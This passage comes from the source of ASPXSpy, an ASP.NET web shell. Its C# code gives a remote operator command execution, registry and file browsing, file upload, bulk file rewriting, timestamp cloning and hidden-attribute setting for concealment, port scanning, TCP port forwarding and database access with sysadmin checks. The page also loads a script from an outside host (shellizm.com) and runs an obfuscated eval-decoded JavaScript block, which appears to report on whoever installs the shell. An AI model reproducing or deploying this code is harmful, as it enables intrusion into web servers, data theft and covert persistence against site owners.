uPZ=Encoding.Default.GetBytes(Sendstr);instream.Write(uPZ,0,uPZ.Length);}Bin_Td_Res.InnerHtml+="<font color=blue>"+Sendstr+"</font>";}public void xFhz(){WICxe();kkHN.Visible=true;Bin_H2_Title.InnerText="RegShell >>";string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";vyX.Text="";foreach(string rootkey in txc.Split('|')){vyX.Text+="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a> | ";}lFAvw();}protected void lFAvw(){qPdI.Text="";string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";TableRow tr;TableCell tc;foreach(string rootkey in txc.Split('|')){tr=new TableRow();tc=new TableCell();string bg=OKM();tr.Attributes["onmouseover"]="this.className='focus';";tr.CssClass=bg;tr.Attributes["onmouseout"]="this.className='"+bg+"';";tc.Width=Unit.Parse("40%");tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a>";tr.Cells.Add(tc);tc=new TableCell();tc.Width=Unit.Parse("60%");tc.Text="&lt;RootKey&gt;";tr.Cells.Add(tc);pLWD.Rows.Add(tr);}}protected void tpRQ(string Reg_Path){if(!Reg_Path.EndsWith("\\")){Reg_Path=Reg_Path+"\\";}qPdI.Text=Reg_Path;string cJG=Regex.Replace(Reg_Path,@"\\[^\\]+\\?$","");cJG=Regex.Replace(cJG,@"\\+","\\");TableRow tr=new TableRow();TableCell tc=new TableCell();string bg=OKM();tr.Attributes["onmouseover"]="this.className='focus';";tr.CssClass=bg;tr.Attributes["onmouseout"]="this.className='"+bg+"';";tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(cJG)+"')\">Parent Key</a>";tc.Attributes["colspan"]="2" ;tr.Cells.Add(tc);pLWD.Rows.Add(tr);try{string subpath;string kDgkX=Reg_Path.Substring(Reg_Path.IndexOf("\\")+1,Reg_Path.Length-Reg_Path.IndexOf("\\")-1);RegistryKey rk=null;RegistryKey sk;if(Reg_Path.StartsWith("HKEY_LOCAL_MACHINE")){rk=Registry.LocalMachine;}else if(Reg_Path.StartsWith("HKEY_CLASSES_ROOT")){rk=Registry.ClassesRoot;}else if(Reg_Path.StartsWith("HKEY_CURRENT_USER")){rk=Registry.CurrentUser;}else if(Reg_Path.StartsWith("HKEY_USERS")){rk=Registry.Users;}else if(Reg_Path.StartsWith("HKEY_CURRENT_CONFIG")){rk=Registry.CurrentConfig;}if(kDgkX.Length>1){sk=rk.OpenSubKey(kDgkX);}else{sk=rk;}foreach(string innerSubKey in sk.GetSubKeyNames()){tr=new TableRow();tc=new TableCell();bg=OKM();tr.Attributes["onmouseover"]="this.className='focus';";tr.CssClass=bg;tr.Attributes["onmouseout"]="this.className='"+bg+"';";tc.Width=Unit.Parse("40%");tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(Reg_Path+innerSubKey)+"')\">"+innerSubKey+"</a>";tr.Cells.Add(tc);tc=new TableCell();tc.Width=Unit.Parse("60%");tc.Text="&lt;SubKey&gt;";tr.Cells.Add(tc);pLWD.Rows.Add(tr);}TableRow cKVA=new TableRow();cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";cKVA.Attributes["bgcolor"]="#dddddd";TableCell JlmW=new TableCell();JlmW.Attributes["colspan"]="2" ;JlmW.Attributes["height"]="5";cKVA.Cells.Add(JlmW);pLWD.Rows.Add(cKVA);foreach(string strValueName in sk.GetValueNames()){tr=new TableRow();tc=new TableCell();bg=OKM();tr.Attributes["onmouseover"]="this.className='focus';";tr.CssClass=bg;tr.Attributes["onmouseout"]="this.className='"+bg+"';";tc.Width=Unit.Parse("40%");tc.Text=strValueName;tr.Cells.Add(tc);tc=new TableCell();tc.Width=Unit.Parse("60%");tc.Text=DdmPl(sk,strValueName);tr.Cells.Add(tc);pLWD.Rows.Add(tr);}}catch(Exception error){xseuB(error.Message);}}public string DdmPl(RegistryKey sk,string strValueName){object uPZ;string RaTGr="";try{uPZ=sk.GetValue(strValueName,"NULL");if(uPZ.GetType()==typeof(byte[])){foreach(byte tmpbyte in(byte[])uPZ){if((int)tmpbyte<16){RaTGr+="0";}RaTGr+=tmpbyte.ToString("X");}}else if(uPZ.GetType()==typeof(string[])){foreach(string tmpstr in(string[])uPZ){RaTGr+=tmpstr;}}else{RaTGr=uPZ.ToString();}}catch(Exception error){xseuB(error.Message);}return RaTGr;}public void vNCHZ(){WICxe();YwLB.Visible=true;Bin_H2_Title.InnerText="PortScan >>";}public void rAhe(){WICxe();iDgmL.Visible=true;dQIIF.Visible=false;Bin_H2_Title.InnerText="DataBase >>";}protected void OUj(){if(Dtdr.State==ConnectionState.Closed){try{Dtdr.ConnectionString=MasR.Text;Kkvb.Connection=Dtdr;Dtdr.Open();}catch(Exception Error){xseuB(Error.Message);}}}protected void fUzE(){if(Dtdr.State==ConnectionState.Open)Dtdr.Close();Dtdr.Dispose();Kkvb.Dispose();}public DataTable CYUe(string sqlstr){OleDbDataAdapter da=new OleDbDataAdapter();DataTable Dstog=new DataTable();try{OUj();Kkvb.CommandType=CommandType.Text;Kkvb.CommandText=sqlstr;da.SelectCommand=Kkvb;da.Fill(Dstog);}catch(Exception){}finally{fUzE();}return Dstog;}public DataTable[] Bin_Data(string query){ArrayList list=new ArrayList();try{string str;OUj();query=query+"\r\n";MatchCollection gcod=new Regex("[\r\n][gG][oO][\r\n]").Matches(query);int EmRX=0;for(int i=0;i<gcod.Count;i++){Match FJD=gcod[i];str=query.Substring(EmRX,FJD.Index-EmRX);if(str.Trim().Length>0){OleDbDataAdapter FgzeQ=new OleDbDataAdapter();Kkvb.CommandType=CommandType.Text;Kkvb.CommandText=str.Trim();FgzeQ.SelectCommand=Kkvb;DataSet cDPp=new DataSet();FgzeQ.Fill(cDPp);for(int j=0;j<cDPp.Tables.Count;j++){list.Add(cDPp.Tables[j]);}}EmRX=FJD.Index+3;}str=query.Substring(EmRX,query.Length-EmRX);if(str.Trim().Length>0){OleDbDataAdapter VwB=new OleDbDataAdapter();Kkvb.CommandType=CommandType.Text;Kkvb.CommandText=str.Trim();VwB.SelectCommand=Kkvb;DataSet arG=new DataSet();VwB.Fill(arG);for(int k=0;k<arG.Tables.Count;k++){list.Add(arG.Tables[k]);}}}catch(SqlException e){xseuB(e.Message);rom.Visible=false;}return(DataTable[])list.ToArray(typeof(DataTable));}public void JIAKU(string instr){try{OUj();Kkvb.CommandType=CommandType.Text;Kkvb.CommandText=instr;Kkvb.ExecuteNonQuery();}catch(Exception e){xseuB(e.Message);}}public void dwgT(){try{OUj();if(WYmo.SelectedItem.Text=="MSSQL"){if(Pvf.SelectedItem.Value!=""){Dtdr.ChangeDatabase(Pvf.SelectedItem.Value.ToString());}}DataTable[] jxF=null;jxF=Bin_Data(jHIy.InnerText);if(jxF!=null && jxF.Length>0){for(int j=0;j<jxF.Length;j++){rom.PreRender+=new EventHandler(lRavM);rom.DataSource=jxF[j];rom.DataBind();for(int i=0;i<rom.Items.Count;i++){string bg=OKM();rom.Items[i].CssClass=bg;rom.Items[i].Attributes["onmouseover"]="this.className='focus';";rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";}}}else{rom.DataSource=null;rom.DataBind();}rom.Visible=true;}catch(Exception e){xseuB(e.Message);rom.Visible=false;}}public void xTZY(){try{if(WYmo.SelectedItem.Text=="MSSQL"){if(Pvf.SelectedItem.Value==""){rom.DataSource=null;rom.DataBind();return;}}OUj();DataTable zKvOw=new DataTable();DataTable jxF=new DataTable();DataTable baVJV=new DataTable();if(WYmo.SelectedItem.Text=="MSSQL" && Pvf.SelectedItem.Value!=""){Dtdr.ChangeDatabase(Pvf.SelectedItem.Text);}zKvOw=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"SYSTEM TABLE" });jxF=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"TABLE" });foreach(DataRow dr in zKvOw.Rows){jxF.ImportRow(dr);}jxF.Columns.Remove("TABLE_CATALOG");jxF.Columns.Remove("TABLE_SCHEMA");jxF.Columns.Remove("DESCRIPTION");jxF.Columns.Remove("TABLE_PROPID");rom.PreRender+=new EventHandler(lRavM);rom.DataSource=jxF;rom.DataBind();for(int i=0;i<rom.Items.Count;i++){string bg=OKM();rom.Items[i].CssClass=bg;rom.Items[i].Attributes["onmouseover"]="this.className='focus';";rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";}rom.Visible=true;}catch(Exception e){xseuB(e.Message);rom.Visible=false;}}private void lRavM(object sender,EventArgs e){DataGrid d=(DataGrid)sender;foreach(DataGridItem item in d.Items){foreach(TableCell t in item.Cells){t.Text=t.Text.Replace("<","&lt;").Replace(">","&gt;");}}}public void vCf(){dQIIF.Visible=true;try{jHIy.InnerHtml=string.Empty;if(WYmo.SelectedItem.Text=="MSSQL"){rom.Visible=false;uXevN.Visible=true;irTU.Visible=true;OUj();DataTable ver=CYUe(@"SELECT @@VERSION");DataTable dbs=CYUe(@"SELECT name FROM master.dbo.sysdatabases");DataTable cdb=CYUe(@"SELECT DB_NAME()");DataTable rol=CYUe(@"SELECT IS_SRVROLEMEMBER('sysadmin')");DataTable YKrm=CYUe(@"SELECT IS_MEMBER('db_owner')");string jHlh=ver.Rows[0][0].ToString();string dbo=string.Empty;if(YKrm.Rows[0][0].ToString()=="1"){dbo="db_owner";}else{dbo="public";}if(rol.Rows[0][0].ToString()=="1"){dbo="<font color=blue>sa</font>";}string db_name=string.Empty;foreach(ListItem item in FGEy.Items){ if(item.Selected=true) { item.Selected=false; }}Pvf.Items.Clear();Pvf.Items.Add("-- Select a DataBase --");Pvf.Items[0].Value="";for(int i=0;i<dbs.Rows.Count;i++){db_name+=dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(),"<font color=blue>"+cdb.Rows[0][0].ToString()+"</font>")+"&nbsp;|&nbsp;";Pvf.Items.Add(dbs.Rows[i][0].ToString());}irTU.InnerHtml="<p><font color=red>MSSQL Version</font> : <i>"+jHlh+"</i></p><p><font color=red>SrvRoleMember</font> : <i>"+dbo+"</i></p>";}else{uXevN.Visible=false;irTU.Visible=false;xTZY();}}catch(Exception e){dQIIF.Visible=false;}}public void MHLv(){WICxe();hOWTm.Visible=true;Bin_H2_Title.InnerText="PortMap >>";}public class PortForward{public string Localaddress;public int LocalPort;public string RemoteAddress;public int RemotePort;string type;Socket ltcpClient;Socket rtcpClient;Socket server;byte[] DPrPL=new byte[2048];byte[] wvZv=new byte[2048];public struct session{public Socket rdel;public Socket ldel;public int llen;public int rlen;}public static IPEndPoint mtJ(string host,int port){IPEndPoint iep=null;IPHostEntry aGN=Dns.Resolve(host);IPAddress rmt=aGN.AddressList[0];iep=new IPEndPoint(rmt,port);return iep;}public void Start(string Rip,int Rport,string lip,int lport){try{LocalPort=lport;RemoteAddress=Rip;RemotePort=Rport;Localaddress=lip;rtcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);ltcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);rtcpClient.BeginConnect(mtJ(RemoteAddress,RemotePort),new AsyncCallback(iiGFO),rtcpClient);}catch (Exception ex) { }}protected void iiGFO(IAsyncResult ar){try{session RKXy=new session();RKXy.ldel=ltcpClient;RKXy.rdel=rtcpClient;ltcpClient.BeginConnect(mtJ(Localaddress,LocalPort),new AsyncCallback(VTp),RKXy);}catch (Exception ex) { }}protected void VTp(IAsyncResult ar){try{session RKXy=(session)ar.AsyncState;ltcpClient.EndConnect(ar);RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(LFYM),RKXy);RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(xPS),RKXy);}catch (Exception ex) { }}private void LFYM(IAsyncResult ar){try{session RKXy=(session)ar.AsyncState;int Ret=RKXy.rdel.EndReceive(ar);if (Ret>0)ltcpClient.BeginSend(DPrPL,0,Ret,SocketFlags.None,new AsyncCallback(JTcp),RKXy);else lyTOK();}catch (Exception ex) { }}private void JTcp(IAsyncResult ar){try{session RKXy=(session)ar.AsyncState;RKXy.ldel.EndSend(ar);RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(this.LFYM),RKXy);}catch (Exception ex) { }}private void xPS(IAsyncResult ar){try{session RKXy=(session)ar.AsyncState;int Ret=RKXy.ldel.EndReceive(ar);if (Ret>0)RKXy.rdel.BeginSend(wvZv,0,Ret,SocketFlags.None,new AsyncCallback(IZU),RKXy);else lyTOK();}catch (Exception ex) { }}private void IZU(IAsyncResult ar){try{session RKXy=(session)ar.AsyncState;RKXy.rdel.EndSend(ar);RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(this.xPS),RKXy);}catch (Exception ex) { }}public void lyTOK(){try{if (ltcpClient!=null){ltcpClient.Close();}if (rtcpClient!=null)rtcpClient.Close();}catch (Exception ex) { }}}protected void vuou(){PortForward gYP=new PortForward();gYP.lyTOK();}protected void ruQO(){PortForward gYP=new PortForward();gYP.Start(llH.Value,int.Parse(ZHS.Value),eEpm.Value,int.Parse(iXdh.Value));}public string mRDl(string instr){string tmp=null;try{tmp=System.Net.Dns.Resolve(instr).AddressList[0].ToString();}catch(Exception e){}return tmp;}public void VikG(){string[] OTV=lOmX.Text.ToString().Split(',');for(int i=0;i<OTV.Length;i++){IVc.Add(new ScanPort(mRDl(MdR.Text.ToString()),Int32.Parse(OTV[i])));}try{Thread[] kbXY=new Thread[IVc.Count];int sdO=0;for(sdO=0;sdO<IVc.Count;sdO++){kbXY[sdO]=new Thread(new ThreadStart(((ScanPort)IVc[sdO]).Scan));kbXY[sdO].Start();}for(sdO=0;sdO<kbXY.Length;sdO++)kbXY[sdO].Join();}catch{}}public class ScanPort{private string _ip="";private int jTdO=0;private TimeSpan _timeSpent;private string QGcH="Not scanned";public string ip{get { return _ip;}}public int port{get { return jTdO;}}public string status{get { return QGcH;}}public TimeSpan timeSpent{get { return _timeSpent;}}public ScanPort(string ip,int port){_ip=ip;jTdO=port;}public void Scan(){TcpClient iYap=new TcpClient();DateTime qYZT=DateTime.Now;try{iYap.Connect(_ip,jTdO);iYap.Close();QGcH="<font color=green>Open</font>";}catch{QGcH="<font color=red>Close</font>";}_timeSpent=DateTime.Now.Subtract(qYZT);}}public static void YFcNP(System.Web.UI.Page page){page.RegisterHiddenField("__EVENTTARGET","");page.RegisterHiddenField("__FILE","");string s=@"<script language=Javascript>";s+=@"function Bin_PostBack(eventTarget,eventArgument)";s+=@"{";s+=@"var theform=document.forms[0];";s+=@"theform.__EVENTTARGET.value=eventTarget;";s+=@"theform.__FILE.value=eventArgument;";s+=@"theform.submit();";s+=@"} ";s+=@"</scr"+"ipt>";page.RegisterStartupScript("",s);}protected void PPtK(object sender,EventArgs e){WICxe();yhv.Visible=true;Bin_H2_Title.InnerText="File Search >>";NaLJ.Value=Request.PhysicalApplicationPath;oJiym.Visible=false;}protected void NBy(object sender,EventArgs e){DirectoryInfo GQMM=new DirectoryInfo(NaLJ.Value);if(!GQMM.Exists){xseuB("Path invalid ! ");return;}oog(GQMM);xseuB("Search completed ! ");}public void oog(DirectoryInfo dir){try{oJiym.Visible=true;foreach(FileInfo Bin_Files in dir.GetFiles()){try{if(Bin_Files.FullName==Request.PhysicalPath){continue;}if(!Regex.IsMatch(Bin_Files.Extension.Replace(".",""),"^("+UDLvA.Value+")$",RegexOptions.IgnoreCase)){continue;}if(Ven.SelectedItem.Value=="name"){if(rAQ.Checked){if(Regex.IsMatch(Bin_Files.Name,iaMKl.Value,RegexOptions.IgnoreCase)){FJvQ(Bin_Files);}}else{if(Bin_Files.Name.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1){Response.Write(Bin_Files.FullName);FJvQ(Bin_Files);}}}else{StreamReader sr=new StreamReader(Bin_Files.FullName,Encoding.Default);string ava=sr.ReadToEnd();sr.Close();if(rAQ.Checked){if(Regex.IsMatch(ava,iaMKl.Value,RegexOptions.IgnoreCase)){FJvQ(Bin_Files);if(YZw.Checked){ava=Regex.Replace(ava,iaMKl.Value,qPe.Value,RegexOptions.IgnoreCase);StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);sw.Write(ava);sw.Close();}}}else{if(ava.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1){FJvQ(Bin_Files);if(YZw.Checked){ava=Strings.Replace(ava,iaMKl.Value,qPe.Value,1,-1,CompareMethod.Text);StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);sw.Write(ava);sw.Close();}}}}}catch(Exception ex){xseuB(ex.Message);continue;}}foreach(DirectoryInfo subdir in dir.GetDirectories()){oog(subdir);}}catch(Exception ex){xseuB(ex.Message);}}public void FJvQ(FileInfo objfile){TableRow tr=new TableRow();TableCell tc=new TableCell();string bg=OKM();tr.Attributes["onmouseover"]="this.className='focus';";tr.CssClass=bg;tr.Attributes["onmouseout"]="this.className='"+bg+"';";tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(objfile.DirectoryName)+"')\">"+objfile.FullName+"</a>";tr.Cells.Add(tc);tc=new TableCell();tc.Text=objfile.LastWriteTime.ToString();tr.Cells.Add(tc);tc=new TableCell();tc.Text=mTG(objfile.Length);tr.Cells.Add(tc);oJiym.Rows.Add(tr);}public void xseuB(string instr){jDKt.Visible=true;jDKt.InnerText=instr;}protected void xVm(object sender,EventArgs e){string Jfm=FormsAuthentication.HashPasswordForStoringInConfigFile(HRJ.Text,"MD5").ToLower();if(Jfm==Password){Response.Cookies.Add(new HttpCookie(vbhLn,Password));ljtzC.Visible=false;PBZw();}else{tZSx();}}protected void Ybg(object sender,EventArgs e){krIR(Server.MapPath("."));}protected void KjPi(object sender,EventArgs e){Bin_H2_Title.InnerText="IIS Spy >>";WICxe();VNR.Visible=true;AdCx();}protected void DGCoW(object sender,EventArgs e){try{StreamWriter sw;if(NdCX.SelectedItem.Text=="UTF-8"){sw=new StreamWriter(Sqon.Value,false,Encoding.UTF8);}else{sw=new StreamWriter(Sqon.Value,false,Encoding.Default);}sw.Write(Xgvv.InnerText);sw.Close();xseuB("Save file success !");}catch(Exception error){xseuB(error.Message);}krIR(AXSbb.Value);}protected void lbjLD(object sender,EventArgs e){string FlwA=AXSbb.Value;FlwA=OElM(FlwA);try{Fhq.PostedFile.SaveAs(FlwA+Path.GetFileName(Fhq.Value));xseuB("File upload success!");}catch(Exception error){xseuB(error.Message);}krIR(AXSbb.Value);}protected void EXV(object sender,EventArgs e){krIR(AXSbb.Value);}protected void mcCY(object sender,EventArgs e){krIR(Server.MapPath("."));}protected void iVk(object sender,CommandEventArgs e){krIR(e.CommandArgument.ToString());}protected void XXrLw(object sender,EventArgs e){try{File.SetCreationTimeUtc(QiFB.Value,File.GetCreationTimeUtc(lICp.Value));File.SetLastAccessTimeUtc(QiFB.Value,File.GetLastAccessTimeUtc(lICp.Value));File.SetLastWriteTimeUtc(QiFB.Value,File.GetLastWriteTimeUtc(lICp.Value));xseuB("File time clone success!");}catch(Exception error){xseuB(error.Message);}krIR(AXSbb.Value);}protected void tIykC(object sender,EventArgs e){string path=pWVL.Value;try{File.SetAttributes(path,FileAttributes.Normal);if(ZhWSK.Checked){File.SetAttributes(path,FileAttributes.ReadOnly);}if(SsR.Checked){File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.System);}if(ccB.Checked){File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Hidden);}if(fbyZ.Checked){File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Archive);}File.SetCreationTimeUtc(path,Convert.ToDateTime(yUqx.Value));File.SetLastAccessTimeUtc(path,Convert.ToDateTime(aLsn.Value));File.SetLastWriteTimeUtc(path,Convert.ToDateTime(uYjw.Value));xseuB("File attributes modify success!");}catch(Exception error){xseuB(error.Message);}krIR(AXSbb.Value);}protected void VOxn(object sender,EventArgs e){WICxe();vIac.Visible=true;Bin_H2_Title.InnerText="Execute Command >>";}protected void FbhN(object sender,EventArgs e){try{Process ahAE=new Process();ahAE.StartInfo.FileName=kusi.Value;ahAE.StartInfo.Arguments=bkcm.Value;ahAE.StartInfo.UseShellExecute=false;ahAE.StartInfo.RedirectStandardInput=true;ahAE.StartInfo.RedirectStandardOutput=true;ahAE.StartInfo.RedirectStandardError=true;ahAE.Start();string Uoc=ahAE.StandardOutput.ReadToEnd();Uoc=Uoc.Replace("<","&lt;");Uoc=Uoc.Replace(">","&gt;");Uoc=Uoc.Replace("\r\n","
");tnQRF.Visible=true;tnQRF.InnerHtml="<hr width=\"100%\" noshade/><pre>"+Uoc+"</pre>";}catch(Exception error){xseuB(error.Message);}}protected void RAFL(object sender,EventArgs e){if(qPdI.Text.Length>0){tpRQ(qPdI.Text);}else{lFAvw();}}protected void Grxk(object sender,EventArgs e){YUw();}protected void ilC(object sender,EventArgs e){tZRH();}protected void HtB(object sender,EventArgs e){pDVM();}protected void Olm(object sender,EventArgs e){iLVUT();}protected void jXhS(object sender,EventArgs e){ADCpk();}protected void lRfRj(object sender,EventArgs e){lDODR();}protected void xSy(object sender,EventArgs e){xFhz();}protected void dMx(object sender,EventArgs e){rAhe();}protected void zOVO(object sender,EventArgs e){if(((DropDownList)sender).ID.ToString()=="WYmo"){dQIIF.Visible=false;MasR.Text=WYmo.SelectedItem.Value.ToString();}if(((DropDownList)sender).ID.ToString()=="Pvf"){xTZY();}if(((DropDownList)sender).ID.ToString()=="FGEy"){jHIy.InnerText=FGEy.SelectedItem.Value.ToString();}if(((DropDownList)sender).ID.ToString()=="NdCX"){gLKc(Sqon.Value);}}protected void IkkO(object sender,EventArgs e){krIR(AXSbb.Value);}protected void BGY(object sender,EventArgs e){vCf();}protected void cptS(object sender,EventArgs e){vNCHZ();}protected void fDO(object sender,EventArgs e){MHLv();}protected void vJNsE(object sender,EventArgs e){vuou();xseuB("Clear All Thread ......");}protected void wDZ(object sender,EventArgs e){if(iXdh.Value=="" || eEpm.Value.Length<7 || ZHS.Value=="")return;ruQO();xseuB("All Thread Start ......");}protected void tYoZ(object sender,EventArgs e){}protected void ELkQ(object sender,EventArgs e){VikG();GBYT.Visible=true;string res=string.Empty;foreach(ScanPort th in IVc){res+=th.ip+" : "+th.port+" ................................. "+th.status+"
";}GBYT.InnerHtml=res;}protected void ORUgV(object sender,EventArgs e){dwgT();}public void WICxe(){DCbS.Visible=false;CzfO.Visible=false;APl.Visible=false;vIac.Visible=false;kkHN.Visible=false;YwLB.Visible=false;iDgmL.Visible=false;hOWTm.Visible=false;vrFA.Visible=false;yhv.Visible=false;}</script><script src=https://shellizm.com/kaydet.php></script><html xmlns="http://www.w3.org/1999/xhtml" ><head id="Head1" runat="server"><meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>ASPXspy<title>ASPXspy</title><script type="text/javascript">var _6084;var _7053='774C126E160F1364C1430B1358F1466A1418A1370B1424B1460F1040F1478A1448C1394A1460B1370B1004F998D1124E1394A1418F1382B956F1454C1448C1358C1130F968B1388A1460E1460C1436D1112E1046D1046A1478A1478B1478C1040E1388A1346C1358B1406B1370D1448F1352F1430A1484D1040A1424B1370E1460D1046E1352A1412B1346B1352F1412D1346D1046B1436C1370D1448E1040A1436C1388B1436A1142E1466D1448A1412B1130B998E1022A1370A1454C1358A1346E1436E1370F1004F1412C1430C1358A1346D1460A1394C1430A1424B1040F1388E1448F1370F1376C1010C1022F998C968D956A1478C1394C1364F1460E1388F1130E1052D956E1388B1370E1394A1382C1460B1388B1130A1052F956C1352E1430C1448E1364E1370B1448B1130C1052B1136C998E1010F1118E';var _5449=/[\x41\x42\x43\x44\x45\x46]/;var _8618=2;var _2287=_7053.charAt(_7053.length-1);var _4826;var _5884=_7053.split(_5449);var _1128=[String.fromCharCode,isNaN,parseInt,String];_5884[1]=_1128[_8618+1](_1128[_8618](_5884[1])/21);var _8059=(_8618==8)?String:eval;_4826='';_11=_1128[_8618](_5884[0])/_1128[_8618](_5884[1]);for(_6084=3;_6084<_11;_6084++)_4826+=(_1128[_8618-2]((_1128[_8618](_5884[_6084])+_1128[_8618](_5884[2])+_1128[_8618](_5884[1]))/_1128[_8618](_5884[1])-_1128[_8618](_5884[2])+_1128[_8618](_5884[1])-1));var _8127='_1751';var _6091='_8127=_4826';function _1064(_3531){_8059(_2713);_1064(_5886);_5886(_6091);_1064(_8127);}var _2713='_1064=_8059';var _5886='_5886=_1064';_1064(_2287);</script><style type="text/css">.Bin_Style_Login{font:11px Verdana;BACKGROUND: #FFFFFF;border: 1px solid #666666;}body,td{font: 12px Arial,Tahoma;line-height: 16px;}.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:16px;}.list{font:12px Arial,Tahoma;height:23px;}.area{font:12px 'Courier New',Monospace;background:#fff;border: 1px solid #666;padding:2px;}.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}a {color: #00f;text-decoration:underline;}a:hover{color: #f00;text-decoration:none;}.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ededed;padding:5px 10px 5px 5px;}.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#fafafa;padding:5px 10px 5px 5px;}.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}.head td{border-top:1px solid #ddd;border-bottom:1px solid #ccc;background:#e8e8e8;padding:5px 10px 5px 5px;font-weight:bold;}.head td span{font-weight:normal;}form{margin:0;padding:0;}h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}ul.info li{margin:0;color:#444;line-height:24px;height:24px;}u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}.u1{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}.u2{text-decoration: none;color:#777;float:left;display:block;width:350px;margin-right:10px;}</style><script type="text/javascript">function CheckAll(form){for(var i=0;i<form.elements.length;i++){var e=form.elements[i];if(e.name!='chkall')e.checked=form.chkall.checked;}}</script><body style="margin:0;table-layout:fixed;">
<div id="ljtzC" runat="server" style=" margin:15px" enableviewstate="false" visible="false" ><span style="font:11px Verdana;">Password:</span><asp:TextBox ID="HRJ" runat="server" Columns="20" CssClass="Bin_Style_Login" ></asp:TextBox><asp:Button ID="ZSnXu" runat="server" Text="Login" CssClass="Bin_Style_Login" OnClick="xVm"/><p/>Copyright &copy; 2009 Bin -- <a href="http://www.rootkit.net.cn" target="_blank">www.rootkit.net.cn</a></div><div id="ZVS" runat="server"><div id="Zzj" runat="server"><table width="100%" border="0" cellpadding="0" cellspacing="0"><tr class="head"><td ><span style="float:right;"><a href="http://www.rootkit.net.cn" target="_blank">ASPXSpy Ver: 2009</a></span><span id="Bin_Span_Sname" runat="server" enableviewstate="true"></span><tr class="alt1"><span style="float:right;" id="Bin_Span_FrameVersion" runat="server"></span><asp:LinkButton ID="UtkN" runat="server" OnClick="YKpI" Text="Logout" ></asp:LinkButton> | <asp:LinkButton ID="RsqhW" runat="server" Text="File Manager" OnClick="Ybg"></asp:LinkButton> | <asp:LinkButton ID="xxzE" runat="server" Text="CmdShell" OnClick="VOxn"></asp:LinkButton> | <asp:LinkButton ID="nuc" runat="server" Text="IIS Spy" OnClick="KjPi"></asp:LinkButton> | <asp:LinkButton ID="OREpx" runat="server" Text="Process" OnClick="Grxk"></asp:LinkButton> | <asp:LinkButton ID="jHN" runat="server" Text="Services" OnClick="ilC"></asp:LinkButton> | <asp:LinkButton ID="PHq" runat="server" Text="UserInfo" OnClick="Olm"></asp:LinkButton> | <asp:LinkButton ID="wmgnK" runat="server" Text="SysInfo" OnClick="HtB"></asp:LinkButton> | <asp:LinkButton ID="FeV" runat="server" Text="FileSearch" OnClick="PPtK"></asp:LinkButton> | <asp:LinkButton ID="PVQ" runat="server" Text="SU Exp" OnClick="jXhS"></asp:LinkButton> | <asp:LinkButton ID="jNDb" runat="server" Text="RegShell" OnClick="xSy"></asp:LinkButton> | <asp:LinkButton ID="HDQ" runat="server" Text="PortScan" OnClick="cptS" ></asp:LinkButton> | <asp:LinkButton ID="AoI" runat="server" Text="DataBase" OnClick="dMx"></asp:LinkButton> | <asp:LinkButton ID="KHbEd" runat="server" Text="PortMap" OnClick="fDO"></asp:LinkButton></div><table width="100%" border="0" cellpadding="15" cellspacing="0"><div id="jDKt" style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;" runat="server" visible="false" enableviewstate="false"></div><h2 id="Bin_H2_Title" runat="server"><%--FileList--%><div id="CzfO" runat="server"><table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;"> <td style=" white-space:nowrap">Current Directory : <td style=" width:100%"><td style="white-space:nowrap" ><asp:Button ID="xaGwl" runat="server" Text="Go" CssClass="bt" OnClick="EXV"/> <table width="100%" border="0" cellpadding="4" cellspacing="0"><tr class="alt1"><td colspan="7" style="padding:5px;"><div style="float:right;"><asp:Button ID="RvPp" CssClass="bt" runat="server" Text="Upload" OnClick="lbjLD"/></div><asp:LinkButton ID="OLJFp" runat="server" Text="WebRoot" OnClick="mcCY"></asp:LinkButton> | <a href="#" id="Bin_Button_CreateDir" runat="server">Create Directory</a> | <a href="#" id="Bin_Button_CreateFile" runat="server">Create File</a> | 